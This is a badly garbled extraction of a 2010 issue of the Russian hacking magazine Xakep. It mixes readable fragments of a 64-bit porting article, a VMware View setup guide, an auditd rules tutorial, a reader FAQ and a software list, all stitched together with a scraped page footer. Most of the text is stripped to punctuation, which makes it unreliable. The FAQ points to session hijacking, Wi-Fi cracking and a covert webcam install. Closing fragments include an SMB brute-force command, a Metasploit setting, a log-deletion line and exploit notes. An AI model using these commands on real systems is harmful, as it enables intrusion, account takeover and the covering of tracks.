n = n >> (CHAR_BIT * sizeof(n) - r);

64- const
size_t M = 0xFFFFFFF0u. 32- , , , ,
, , .
, x64 M
0x00000000FFFFFFF0u. ,
#ifdef, .
0xFFFFFFF0u
#ifdef _WIN64
#define CONST3264(a) (a##i64)
#else
#define CONST3264(a) (a)
#endif
const size_t M = ~CONST3264(0xFu);

-1. 0xFFFFFFFF. 64-
,
:
116

#define INVALID_RESULT (0xFFFFFFFFu)
size_t UserStrLen(const char *str)
{
if (str == NULL)
return INVALID_RESULT;
...
return n;
}
size_t len = UserStrLen(str);
// 64-

if (len == (size_t)(-1))
//
if 32- , x64
.
, INVALID_RESULT,
32-, 64- , :
#define INVALID_RESULT (size_t(-1)).
,
32- 64-. ,

, . z
X 11 /142/ 10
SYN/ACK
grinder grinder@tux.in.ua
VMware View 4.5:

,
.
. , ,
, , , ,
.
.
VMware View?
, .
:
, (),
. ,

, . , .

.
, .
.
, .
, , .
,
, . , , (SaaS, Software as a Service)
; Google: GMail, Google
Calendar, Google Docs .
?

, ,
.
. , ,
, ,
,
, .
( ),
.
?
.
(VDI, Virtual Desktop
Infrastructure). (Desktop as a Service,
DaaS), .

, ,
. , ,
118
. , , VDI
. ,
, .
: VDI MS Remote Desktop Services ( Win2k8R2
MS Terminal Services)?. , ,
. VDI TS/RDS ,
. , TS/RDS, , , . ,
, TS .
.
VDI
, , .
. ,
, View Client with Local Mode
VDI-.
VDI
, . , VDI
TS,
.
VMware View 4
VMware ,
VMware View (vmware.com/products/view), . View VMware VDI, , 3.0,
VMware View.
PCoIP (PC-over-IP),

, . HD-,
USB-, LAN WAN. ,
, ,
. ,
X 11 /142/ 10
PCoIP. PCoIP VMware View

( )
RDP HP RGS (Remote Graphics Software).
View VMware vSphere/
ESX ][. View . View
Manager ,
VM.
View Connection Server Security Server.
, , ,
( LDAP-)
. ( ). DMZ ,
, , WAN, .
VMware View Display,
. VMware View Direct
USB-. VMware View Printing,
. , ,
Unified Access (SSO)
. View Composer

. VMware ThinApp , ,
.
View Connection Server NLB- Windows.
View
Client, .
with localmode;
View Manager. View Manager, VM, , TS
.. View Agent. 32-
64- Windows, , Mac OS X.
VMware View
X 11 /142/ 10
Open Client (code.google.com/p/vmware-view-open-client), Windows-

VMware View, Linux Mac OS X. Open
Client LGPL v 2.1. - (View Portal).

- View Administrator, View PowerCLI
PowerShell vdmadmin.
4.5,
. ,
Win7, Mac OS X, , SCOM (System
Center Operations Manager), PowerShell .
.
, , VMware ROI
(Return on Investment) VMware View (roitco.vmware.com/vmw). VMware
View Enterprise Premier,
Bundle Add-On. , .
,
.
VMware View
VMware
, VMware View ( ). , .
Hardware Compatibility Guide
(vmware.com/resources/guides.html). ESX/ESXi,
.
VMware View VMware vSphere ESX/ESXi Server
vCenter ( ).
Active Directory, . View
OU,
GPO . IP-
119
SYN/ACK
View
Composer
DHCP DNS.
VMware View x86
Win2k3SP2 x86/x64 Win2k8R2,
.
2 CPU 2 RAM. ,
.
, View.
View Composter. .
,
( Win2k3 MS Framework 3.0). Database
Information , .
ODBS DSN Setup .
SQL- View
MS SQL Server 2k5/2k8, Express Edition ( 50 VM)
Oracle.
. Express Edition
Microsoft SQL
Server Management Studio Express (SSMSE),
MS. , Composer ( 8443).
View Connection Server. , ,
. IP-
. ,
.. Installation Options .
:
View Stardart Server
;
View Replica Server
; LDAP ;
View Security Server ;
DMZ LAN,
View , ;
View Transfer Server Local Mode.
,
Windows Firewall .
, Do not configure Windows
Firewall,
80, 443, 4001, 4100 8009 . , Install
. VCS
, .
120
View Connection Server
View Administrator
- View Administrator
.

https://server/admin. - IE
6/7 FF 3.0/3.5, Adobe Flash Player 10, . , -Win-
MS.
Domain Admins , .
,
.
View Administrator ,
,
.
. ,
( ),
. , : Dashboard, Users and Groups,
Inventory, , Policies View Configuration.
. ,
,
VA .
. View Configuration Product Licensing and Usage,
Edit License ,
VMware.
, ,
BUILTIN\Administrator. View
Configuration Administrators. Add User and Group,
.
.
, View,
.
View vCenter,
View Configuration Servers. Add
IP .
View Composer, Enable View Composer.
, Domains
Add, ,
, . ,
X 11 /142/ 10
INFO
info
View
Administrator
VMware vSphere

][
2010 .
VMware
View Citrix
XenDesktop, Systancia
AppliDis Fusion,
Ericom PowerTerm
WebConnect, Oracle
VDI.

, vCenter
View Administrator. Edit
:
SSL , URL ,
-, .
( , SSL,
)
View Configuration Global Setting.

vSphere,
. , VM,
VMware Tools. ,
View Agent,
. ,
.
, vCenter (,
VM, ). VD Inventory.
:
Automated Pool vCenter,
;
Manual Pool ,
, ,
vCenter;
X 11 /142/ 10
View Connection
Terminal Services Pool

Microsoft.
VM Pools,
Add .
, Pool ID. Setting
: , logoff, Adobe Flash. Connection Server; Connections
Server Restrictions, , ,
. ,
.
Desktops.
, VMware View
, .
. .
!z
121
SYN/ACK
, InfoWatch
, ,
. , ?
, , ,
....
. , ,
.
, ,
, . ,
. ,
(
,
). , , :
146 .
,
, 2007 146 (
) .
,
146-, . , , , .
, ,
, , , , ...
. . -
. ,
. ( , , ).
, . :
( 146-) , , , .
,
. ,
. ,
122
. . .
.
, .
;
.
, ,
, . , .
... ,
C, , , ,
,
. , , :
, .
,
, .
, . ,
, (, ,
).
, ,
. , ,
, , ,
. .
, ,
, .
, , , , , , .
.
, ;
, , .
(
) , , .
X 11 /142/ 10
, ,
( -
) . .
...
,
.
, , , ,
.
,
. ,
,
( ; )
,
.
.
, , , , ,
. , ,
.
. , , ,
, , ,
, ?
, :
?.
. .
. .
, , ,
.
.
X 11 /142/ 10
,
, , , , .
: , , ,
.
?
,
. . ,

. ,
play. record.
.
.

(, ).
, , .
. -.
, ,
- , ,
. -,
, . -,
, .
, . , ,
.
. ( , ).
123
SYN/ACK
C
3
C
1)
2
2)
3)

, , , ,
.
, ,
50 ( ) ?
, . , ,
, .
(
50 ),
. (omerta
, ,
. ).

.
.

. ,
. , DeFacto.
, .

? :
,
, , , . .
, ?
124
,

? , .
,
. ,
(
;
), :
!. , ,
, 146- -
. . (
) . .
,
: (
),
.
( )
.
.
, , .
, ,
, ,
. .
,
. ,
- . .
, .
X 11 /142/ 10
4000 . .
XVII . .
. 35
. 1 . 44

, ;
, , , ,
()

;
, , ()
( XX )

, :
,
.
, , .
, /
. ,
( ). []
.

( ).
/
. .
.
, ,
.
, ,
:
, . (. 2
. 42 ) .

.
: , , . ,
; ,
,
. , .
.
, ,
: , ,
? .
,
.
( , ,
), , , .
. ,
X 11 /142/ 10
. ,
(
, ), .
. , ,
, . , . ,
:
. . .

.
( )?

, . , , ,
.
, .
, ,
. ,

. ? , ,
. ,
,
, .

.
, ,
(, ). . ,
.

. , .
,
. ,
146- .
. , ,
. , .
! z
125
SYN/ACK
zobnin@gmail.com
DVD

auditd,

Debian/Ubuntu.

Linux
- Linux-
.
, .
-,
.
,
, - ( ).
,
, .
, / ,
, ,
, . Linux,
,
,
- .
2.6
2.6, Linux , .
, :
(, );
/ ;
;
;
;
;
.
,
.
, , ,
, .
,
auditd.
auditd Linux-
.
, auditd Debian/Ubuntu, :
$ sudo apt-get install auditd
, ,
:
126
auditctl , .
,
;
autrace , ( strace);
ausearch ,
;
aureport , ;
( , sudo auditctl -l).
- , . ,
, ,
Linux.

. , , ,
, ,
,
. ,
, . , , .
.
, , . , ,
,
auditd ,
.
, auditd.
,
(

).
, ,
, , ..
,
X 11 /142/ 10

(, , ,
). , - ,
,
.
,
auditctl. ,
:
-a ;
-d ;
-D ;
-l .
auditctl -l , , , No rules, ,
. auditctl:
# auditctl -a , -S __
-F
, . :
task , ;
entry , ;
exit ,
;
user , , uid, pid gid;
exclude .
, . ,
,
. entry exit,

, .
'-a' , . : never always.
,
.
'-S', ,
(,
open, close, exit, ..). .
X 11 /142/ 10
'-F'
. ,
,
open(), /etc, :
# auditctl -a exit,always -S open -F path=/etc/
, , ,
:
# auditctl -a exit,always -S open -F path=/etc/ -F perm=aw
'a' ( attribute change), 'w'

( write). 'r' (read) 'x'
(execute). :
pid , , apid ,
, success ,
, a1, a2, a3, a4
. key
,
, . ,
man- auditctl.
, auditctl , '-S' . ,

( '-p' perm):
# auditctl -a exit,always -F dir=/etc/ -F perm=wa
( '-p' perm, '-k' key):

# auditctl -w /etc/ -p wa -k access_etc
:
# auditctl -w /etc/passwd -p wa
, .
auditd : /etc/audit/auditd.
127
SYN/ACK
auditd.conf
audit.rules
audictl
audispd
aureport
auditd
audt.log
application
autrance
ausearch
audit
kernel

conf /etc/audit/audit.rules (
/etc).
, , , . ,
.
auditctl, ,
, ,
. :
, Steve Grubb
-w /var/log/audit/
-w /var/log/audit/audit.log

.
,
. , Debian/Ubuntu!
-w /etc/passwd -p wa
-, :
#
-D
# ,
-b 8192
# (,
)
# 0
# 1 dmesg
# 2 (kernel panic)
-f 1
,
- .
, , .
# vi /etc/audit/audit.rules
#
-w /etc/audit/auditd.conf -p wa
-w /etc/audit/audit.rules -p wa
-w /etc/libaudit.conf -p wa
-w /etc/default/auditd -p wa
#
128
# at
-w /var/spool/at
-w /etc/at.allow
-w /etc/at.deny
# cron
-w /etc/cron.allow -p wa
-w /etc/cron.deny -p wa
-w /etc/cron.d/ -p wa
-w /etc/cron.daily/ -p wa
-w /etc/cron.hourly/ -p wa
-w /etc/cron.monthly/ -p wa
-w /etc/cron.weekly/ -p wa
-w /etc/crontab -p wa
-w /var/spool/cron/root
#
-w /etc/group -p wa
-w /etc/passwd -p wa
-w /etc/shadow
#
-w /etc/login.defs -p wa
-w /etc/securetty
-w /var/log/faillog
-w /var/log/lastlog
#
-w /etc/hosts -p wa
#
-w /etc/init.d/
-w /etc/init.d/auditd -p wa
X 11 /142/ 10
HTTP://WWW
links
aureport
#
-w /etc/ld.so.conf.d
-w /etc/ld.so.conf -p wa
#
-w /etc/localtime -p wa
#
-w /etc/sysctl.conf -p wa
#
-w /etc/modprobe.d/
# PAM
-w /etc/pam.d/
# SSH
-w /etc/ssh/sshd_config

,
. ,

,

.
#
-a entry,always -S chmod -S fchmod -S chown
-S chown32 -S fchown -S fchown32 -S lchown -S
lchown32
# ,
-a entry,always -S creat -S open -S truncate

-S truncate64 -S ftruncate -S ftruncate64
#
-a entry,always -S mkdir -S rmdir
#
-a entry,always -S unlink -S rename -S link
-S symlink
#
-a entry,always -S setxattr
X 11 /142/ 10
aureport -f grep
-a
-a
-a
-a
-a
entry,always
entry,always
entry,always
entry,always
entry,always
-S
-S
-S
-S
-S
lsetxattr
fsetxattr
removexattr
lremovexattr
fremovexattr
#
-a entry,always -S mknod
#
-a entry,always -S mount -S umount -S umount2
# ptrace

-a entry,always -S ptrace
, auditd
/var/log/audit,
, ,
.
aureport, -.
, , ,
,
, .. ,
. , '-f', ,
:
Steve Grubb
Red Hat

:
http://people.
redhat.com/sgrubb/
audit/visualize/
mkgraph
http://people.
redhat.com/sgrubb/
audit/visualize/mkbar
WARNING
warning
,

auditd,
,

/etc/init.d/auditd
restart.
$ sudo aureport -f
,

(
'--end' ):
$ sudo aureport -f --start 08/20/10 12:00
--end 08/20/10 13:00
: now
(), recent ( ), today (
), yesterday ( ), this-week
(), this-month () this-year ().
129
SYN/ACK
auserch -
:
$ sudo ausearch -ui 2010
:
$ sudo ausearch -x /usr/bin/nmap
:
$ sudo ausearch -tm pts/0
aureport --f --summary ,

, ( ):
:
$ sudo ausearch -tm cron
:
1. ;
2. ;
3. ;
4. ;
5. ( ,
'-i');
6. (yes no);
7. , ;
8. Audit UID (AUID). ;
9. .
,
'--summary', aureport
,
:
$ sudo aureport -f -i --start recent --summary
,
(
), .
// ,
aureport, ,
:
$ sudo aureport -f -i --start today | grep /etc/passwd
,
ausearch:
$ sudo auserch -a _
ausearch
:
$ sudo ausearch -sc ptrace -i
130
$ sudo auserch -k etc_access
ausearch , , aureport. aureport

,
, , , ( '-s'),
( '-au') , (
'-l'), ( '-m') (
man-).
, ( '--failed').
AUID PAM
su sudo
(UID), -
.
Audit UID
(AUID),

UID su sudo. ,
AUID (
aureport -1), , ,
PAM.
/etc/pam.d/login session required pam_loginuid.
so session include common-session. /etc/pam.d/sshd, /etc/
pam.d/gdm (kdm, KDE), /etc/pam.d/
crond /etc/pam.d/atd.
Linux, . , , ,
. z
X 11 /142/ 10
UNITS
Oriyana oriyana@xpsycho.ru
PSYCHO:
100% o a ao. a
ooa oa aooa a
a, aa a, a oo . a
ooo aa , o a aa,
oo . !
! ! !
, .
?
:

1973
-,

; , ,
-
.
,
,
,
, ,
,
,

. , ,

, :
, -
, ,
H. , -,
. ,
- .

132
,
,
.

,
, ,
,
. , ,
, . ,

, ,
, .
--- ,

, ,
:
1.
;
2.
;
3. , .
,
,
,

.
, , , (
, ,
- ?).
, ,

. ,
,
X 11 /142/ 10
,
. ,
,
.
1.
.
,
.
, ,
,
. ,
,
, ;
,
, ,
,
,

, .
,
, ,
, , ;
X 11 /142/ 10
, -
.
,
, ,
, , ,
,
.
2.
,
.
, ,
:
?
.
, : 10
, ; , .
, , . ,
. : , , ,
( , :)).
, (. -
)
,
, - ,
.
133
UNITS

1986 - , .
,
.
: , , , , .
, , ,
. , , ( , ) .
, ?

!
134
;
,
(!!!) ;
,

,
.
( , ,
), . , ,
,
, .
3. ,
.
.
, ,
: , , -,
-,
,

, - . ,

, , .
:
,
(, ,
,
,
..) ( , X 11 /142/ 10
,
!

)? , ,
, .
:
,
(.
). . ,

Corsair
H70, 50.
? , .
.
,

.
: ,
( ),

,

.
: , ,
, , echo print
( ,

):)? , ,
, ,
, . , ,
X 11 /142/ 10
- , .
:

, ,
,
.
,
. ,
( ),

, .
: , ,

,
, .
: ,
-, ,
,
( ,
). :
,
?
.
-, , , ,
,
; -,
,
, ,
.

(
):
,
.
? .
,
.
, . .
.
:
!
!
:
:
,
! ! , , ?
.
,
:
!
!
:
,

.
135
UNITS
,
? ,
,
, , . , ,
: , ,

(), , ,
,
.
.

, ,
, .

;
.
, , , ?
-
. ,
, :).
aka

: , ,
, ,
?
, : --!. ,
: . ,
: , .
,
, ,

,
. ,

136
. ,
,
, ,
, -
,
.
, . , ,
, ,
,
:
- ?,

: ? , !
! ,
, ,
,
. :
,
.
, : ( ) + ( ) = .
, , : -
( ) = ( ).
,
(
). ,
,
- ,
.
,
. ,

,
.

. , ,
;

,

,
( ). -
, , - .
,
,

, .
,
, , ,
, .
, , , ,

.
: ,
-

, ,
,
.
-
- (
),
, , ,
.

,
, , ,
.
,

,
X 11 /142/ 10
, Left4Dead
.

,
,

, , ,
.
, ,
,
.
, ,
- ( ).
,
,
. ,
,
, ;
-
3-4 , ,
.
,
,
.
:
, , , ; .

70-80% ( ,
,
,
), .
X 11 /142/ 10
, , , ,
.
. ,
- ,
,
. ,

, ,

,
.
, ,

.
1. ,
,
. ,
,
,
, .
, ,
.
( )
. ,
- (,
, ):
, , ( ) -
,
. ,
, , -,

2.
,
,
: , , ,
.

,

(
).
3.
:
, . ,
90% ,
, 2-3 ,
, . , ,

, .
,
MLM ( ).
, ,
, ,
. z
137
UNITS

faq
united?
,
faq@real.xakep.ru
Q: , . .
-
, ? ?
A: /
com/p/torsocks).
:
USB- USB Flash Benchmark,

usbflashspeed.com. ,
.
,
Top 10 of the fastest Flash Drives
. ,
, Silicon Power LuxMini
920, 1000 .

, Torsocks,
DNS- . , , ,
.
Q:
Tor?
A:
Socks,
Torsocks (code.google.
138
apt-get install torsocks

usewithtor ssh username@ssh.com
torsocks pidgin
Q: ,
Malware?
A: Windows- OllyDbg,
IDA Pro
, , ,
.
REMnux (zeltser.
com/remnux),

. ,
Ubuntu, PDF- Flash-,
,
JS-,
, .
REMnux LiveCD VMware,
VMware Player.
Q: ,
802.11n, .
, Wi-Fi
Atheros,
. ?
A: , Wi-Fi-
Atheros AR9xxx. .

802.11n ,

. .
EEPROM,
, X 11 /142/ 10
Logitech Touch Mouse

iPhone/
iPad

. rghost.ru/2603267.
, ,
Windows Vista/7 x64
;
<F8>
.
:
1.
atheros_eeprom_tool.exe;
2. Read EEPROM EEPROM,
READ.
3. , ,

EEPROM. Write
EEPROM
.
4. Modes and
Channels .
5. Modes 802.11n (20MHz) 802.11n
(40MHz) 2.4GHz. 5GHz. Channels
0x67 OK.
13. ,
Use custom modes and channels, WRITE.
14. , .
(rghost.
ru/2501075).

. Windows7 x64,

.
Driver Signature Enforcement Overrider (www.
ngohq.com/home.php?page=dseo).
Q: - 802.11n ,
.
A:
Wi-Fi. 802.11n WPA2-PSK+AES X 11 /142/ 10
,
.
40MHz
1 9.
Q: , Windows Linux ( GRUB).

, (
) , .
A: ,
,
, .
-
. GRUB
.
:
;
Linux;
.
: GRUB2
e, GRUB Legacy
e, ;
, linux
kernel, quiet
splash ( ),
single init=/bin/bash;
( GRUB2,
Ctrl+X, GRUB Legacy Esc,
b).

.
Q: .
, .
A: ( )
, .
OllyDbg :
, -
,
Breakpoint Memory, on access.
Windbg,
ba.
: [ba r/w/e size adr],
r/w/e ( ,
), size , adr .
Q:
Visual Studio?
A: , . :
1. File Open Project/
Solution
(, c:\Windows\System32\calc.exe);
2.
Debug
command line.
Q:
.
,
.
A: -,
HTTP-,
.
,
Sessionthief (scriptjunkie1.
wordpress.com/2010/07/17/sessionthief).
,
, ARP poison ,
HTTP-. ,

Sessionthief
Firefox
.
139
UNITS
, ,
,
, . ,

.
CMOS
Q: ,

.
.
A:
,
(DoIt, AutoIT ..).

, Mimer.

, ,
, .
Q:
.

. ,

WEP- SSID,
. , , ,
?
A:
, -
. . :)
Backtrack4 R1 Wifite,

WEP WPA .
(
, WEP,
..) GUI- .
, Wifite
WPA handshake'.
Q:
-
?
A: ,
-
.
RemCam 2
(redsh.ru),
/.
(
)
install.cmd,
, ( ),
140
Q: x-,
(
)
HTTP- .
?
A:
Fiddler. , HTTP(S)-

. ,

. ,

FiddlerCore (fiddler.wikidot.
com/fiddlercore),
.NET-.

API.
Q:
Windows, (
)?
A: CMOS De-Animator
(www.st-ware.com), CMOS, ,
,
. , Clear CMOS
, .
Q:
?
A: , .
Darik's Boot and Nuke (www.
dban.org). LiveCD,

. DBAN
, .
,

, :
,
.
Q: iPod , iTunes,
. ,
?
A: , iTunes ,
,
Apple .
, : CopyTrans
Manager (www.copytrans.net), Foobar2000
(www.foobar2000.org), MediaMonkey (www.
mediamonkey.com), Songbird (getsongbird.com).
Q: ,
?
A:
date | md5sum. , date md5sum
. ,
Cygwin (www.cygwin.com).
Q: -
.
Wi-Fi
.
A:
Logitech,

Logitech Touch Mouse (www.logitech.com).
-. Touch Mouse Server
(
Mac OS X), iPhone iPod Touch
Touch Mouse.
,
IP ,

.
, ,
. ,
Touch Mouse
, , ,
Android?
Q:

. ? ?
A: , ,
, , . ,
,
,
.
,
,
.
.
,
PayPal.

. -, ,
. ,
,
. z
X 11 /142/ 10
>Net
Feed Demon 3.5.0.11 Beta
FireFTP 1.0.9
Google Chrome 7.0.536.2 Beta
>Multimedia
Alcohol 120% 2.0.1.2033
Blender 2.54 Beta
Evernote 3.5.6
FastStone Image Viewer 4.2
IrfanView 4.27
SPlayer 3.5
TagScanner 5.1.592
Portable-
Zoner Photo Studio Free 1.2
ZumoCast 1.1
>Misc
Appetizer 1.4
ArsClip 3.1.4
EasyDuplicateFinder
Eraser 6.0.7
Everything 1.2.1
FileLocator Lite 2010
FileToFolder 2.0
LastPass 1.70.1
LockHunter
PrtScr
PStart 2.11
Rainlendar 2.8
SecondShell 2.0.1
Tahometer Agent 1.0.8.2
Transmiti
VirtuaWin 4.3
WinDirStat 1.1.2
Windows 7 Taskbar Items Pinner
WRITEMONKEY 0.9
>Development
dirtyJOE 1.1
EMS SQL Manager for PostgreSQL
4.7
Inno Setup 5.3.11
PostgreSQL 9.0.0
TortoiseSVN 1.6.11
>Devel
Acovea 5.0
>>UNIX
>Desktop
2ManDVD 1.4.0
3ddesktop 0.2.9
Anki 1.0.1
Clementine 0.5.3
Eaglemode 0.79.0
Enlightenment 1.0.6
Fbpanel 6.1
Foobnix 0.2.1
FreeMat 4.0
Hawkscope 0.6.2
QLandkarte GT 0.19.2
raw2jpeg 0.1
Shutter 0.86.4
Thunar 1.1.0
Tulip 3.4.1
VLC 1.1.4.1
Win2-7 Pack 5.9.1
Xt7-Player 0.9.244
>System
Cameyo 1.5
ClamWin Free Antivirus 0.96.2.1
CleanMem 1.5.1
Comodo System Cleaner 2.2
Defraggler 1.21
Sandra 2010 SP2 v16.67 (freeware)
System Ninja 1.5
TimeComX 1.2.4.10
Toucan 3.0.3
Update Checker v1.038
WinPatrol 19.0.2010.0
xplorer2 lite v1.8
>Security
Burp Suite 1.3
CMOS De-Animator v2
DAVTest 1.0
Dojo 1.0
evercookie 0.3b
FindDomains 0.1.1
Hamster Sidejacking Tool 2.0.0
Havij v1.12 Free
HotFuzz
Knock 1.4.2 beta
Ncrack 0.3a
Netsparker Community Edition
OWASP Code Crawler 2.7
RIPS 0.35
Sessionthief
Simple Malware Check Tool 1.2
StreamArmor v1
THC-Hydra 5.8
TrueCrypt 7.0a
TSK 3.2.0b1 beta
Http File Server 2.2f

inSSIDer 2
TweetMyPC 3.5
WinSCP 4.2.9
XeroBank 3.9.10
>Server
389 Directory Server 1.2.6.1
3proxy 0.6.1
6tunnel 0.11
>Security
aafid2 0.10
ADMsmb 0.3
ADMsnmp 0.1
Aescrypt 0.7
AIM Sniff 1.0b
Bed 0.5
BlueBugger 0.1
Cupp 3.1
ferm 2.0.7
HotSpotter 0.4
ICMPchat 0.7
Kismet 2010-07 R1
Mixminion 0.0.8a
saltymd5 0.2
Sessionthief
SIPcrack 0.4
Wifite
Wireshark 1.4
>Net
Aget 0.4.1
Apinger 0.6.1
Crossroads Load Balancer 2.68
Evolution 2.32.0
Evolution Exchange 2.32.0
Gajim 0.14
Google Chrome 6.0.472.63
Hotot 0.9.4
InspIRCd 2.0.2
MapProxy 0.8.5
Minbif 1.0.4
Mozilla Firefox 3.6.10
NiX 1.4.0
Opera 10.62
ProxyChains 3.1
Steadyflow 0.1
Subdownloader 2.0.13
uTorrent alpha 3.0
>Games
Steel Storm Episode I
Ald 0.1.7
Autoconf 2.68
Cairo 1.10.0
Clutter 1.4.0
fabulous 0.1.5
GDB 7.2
gjrand 3.3.3
Gmail4J 0.3
Jad 1.5.8e
KDevelop 4.0.2
libgee 0.6.0
libpng 1.4.4
ORBit2 .2.14
Qt 4.7
SPE 0.8.4
Swftools 0.9.1
Zend Optimizer 3.3.9
>>MAC
7zX 1.7.1
Adium 1.3.10
Battery Health Monitor 1.5
Black Hole 1.2
Carbon Copy Cloner 3.3.4
CleanMyMac 1.9.3
Hawkscope 0.6.3
MacPorts 1.9.1
muCommander 0.8.5
OnyX 2.1.8
Opera 10.62
Seashore 0.5.1
SnapNDrag 2.5.7
StuffItExpander 2011
Tor 0.2.1.26
Transmission 2.04
VLC 1.1.3
>System
Ajenti
bzip2 1.0.6
Deja Dup 16.0
Drive I/O System Monitor Plasmoid
0.1
Gnome System Monitor 2.28.2
intltool 0.41.1
ATI Catalyst 10.9
Linux Kernel 2.6.35.7
Lzip 1.11
Monit 5.2
PlayOnLinux 3.8.3
R.I.P. 10.9
Spice 0.6
UNetbootin 490
xf86-video-intel 2.13.0
Apache 2.2.16
bftpd 3.1
BIND 9.7.2-P2
CUPS 1.4.4
Darwin Streaming Server 6.0.3
DHCP 4.1.1
MySQL 5.5
OpenLDAP 2.4.23
OpenSSH 5.6
OpenVPN 2.1.3
PostgreSQL 9.0
Samba 3.5.5
Squid 3.1.8
twoftpd 1.41
UnrealIRCd 3.2.8.1
/
142
11(142) 2010
>>WINDOWS
>Dailysoft
7-Zip 4.65
DAEMON Tools Lite 4.35.6
Download Master 5.7.6.1233
Far Manager v2.0 build 1420 x86
FileZilla Client 3.3.4.1
foobar2000 1.1
K-Lite Codec Pack 6.4.0
Miranda IM 0.9.4
Notepad++ 5.8.1
Opera 10.62
PuTTY 0.60
Skype Last
Sysinternals Suite (september)
Total Commander 7.55
Unlocker 1.9.0
XnView 1.97.8
x 11 () 2010
ZEUS
METERPRETER

. 26
HTML5?
11 (142) 2010

: 2
10
.
. 64

TCL
. 50
CISCO
!
800 !
8.5
DVD
191
2200 .
23%
( )
(250 )
30 ,
31 ,
31 .

+ DVD
DVD
+ DVD
Total Football
+ DVD
DVDXpert
+ DVD
Smoke
PC : DEAD SPACE 2

10
: 250
#10(82) 2010
DEAD
SPACE 2
. 36
BIOSHOCK INFINITE

+ DVD
. 90
. 44
DRAGON AGE 2
, RPG
MAFIA 2
PC
+ 2 DVD
Mountain Bike
Digital Photo
+ DVD
+ DVD
T3
Onboard
Ski Pass
! !
. 50
.
: 210

11 (142) 2010
HTML5?
. 26
ZEUS
METERPRETER

CISCO

TCL
. 64

+ + 2 DVD: - 162
( 35% , )
+
12 3890 (24 )
6 2205 (12 )
,
.
,

, :
!
1. ,
,
http://shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
(495) 780-88-24;
119021, , . ,
. 11, . 44, , .

72 000 QIWI
() .
!
.
,
. , ,
.
, .
( )

. .
6 c 1260 ( ).
6
R-kiosk , . , .27-31 648 .
,
.
(495)780-88-29 ( ) 8-800-200-3-999 ( ,
, ). , /
INFO@GLC.RU WWW.GLC.RU .
UNITS
HTTP://WWW2

TOPCODER
www.topcoder.com
?
, ? ?
- .
TopCoder. Java, C++ C#,
$25 $300. ,

TopCoder Open. ,
Google Code Jam.
TAHOMETER
www.tahometer.com

, .
: ?.

.
tahometer, , . ,
. tahometer , .
DNS-

IPQ.CO
www.ipq.co
bit.ly tiny.cc,
URL- (,
http://bit.ly/9OtU7h). , ipq.co ,
, IP-. , DNS-,
.
IP, hostname
n4c10h.ipq.co, . , . ipq.
co , ,
- .
144
SPOTTHEVULN
www.spotthevuln.com

,
, . SpotTheVuln
.
? , , SQL Injections
.
(, WordPress) SpotTheVuln
,
. , .
X 11 /142/ 10

Хакер 2010 11 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2010 11 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

.

Nod32, Avast, Avira:

Chaos Constructions 2010

Hex- vs. malware

Windows Filtering Platform

3D- iPhone SDK

VMware View 4.5:

/ .: (495) 935-7034, : (495) 780-8824

/ .: (495) 935-4034, : (495) 780-8824

APP STORE INTEL

Incident Response Team

: Intel Core i3-370M 2,4 GHz

ASUS U35Jc Mobile Intel

NAS Synology, DSM

PSK-. The Underground

HIS HD 5850 ICOOLER V

HIS Radeon HD 5850

HIS Radeon HD 5870

Inno3D iChiLL Black Series

Heaven Dragon, FPS

HIS HD 5850 iCooler V

HIS HD 5850 iCooler V

Street Fighter IV, FPS

HIS HD 5850 iCooler V

HIS HD 5850 iCooler V

Dark Void, FPS

Resident Evil 5, FPS

HIS HD 5850 iCooler V

HIS HD 5850 iCooler V

Batman: Arkham Asylum, FPS

Google Chrome 3D WebGL

var worker = new Worker("my_xaking_script.js");

Hex Editor Neo:

FileInsight hex- Windows

Hex Editor Neo

radare hex- unix

SkyDNS (www.skydns.ru) , DNS

GET /spec.html HTTP/1.1

, PNG- ETag, PHP-

medusa -M smbnt -C combo.txt

ASLR Acrobat Reader.

Acrobat Reader Win7 DEP, ROP,

msf > set LPORT 80

* Apple QuickTime < 7.6.8

Heap Spray 0x15220000,

Acrobat Reader , VeriSign

* Adobe Acrobat Reader <= 9.3.4

Acrobat Reader Windows 7

Adobe Acrobat Reader .z

Windows File Protection.

"cmd.exe /c del #{tmp}\\#{logscranble}",

host + "-"+ ::Time.now.strftime("%Y%m%d.%M%S"))

dll injection nologin.org/

interfaces proc near

mov [rsp+arg_18], r9d

mov [rsp+arg_8], rdx

mov [rsp+arg_0], rcx

lea r8, [rsp+0C8h+var_2C]

lea rdx, aLink ; "Link"

mov rcx, cs:NDIS_IF_BLOCK_NAME

test eax, eax

lea rcx, aCanTGetOffs_22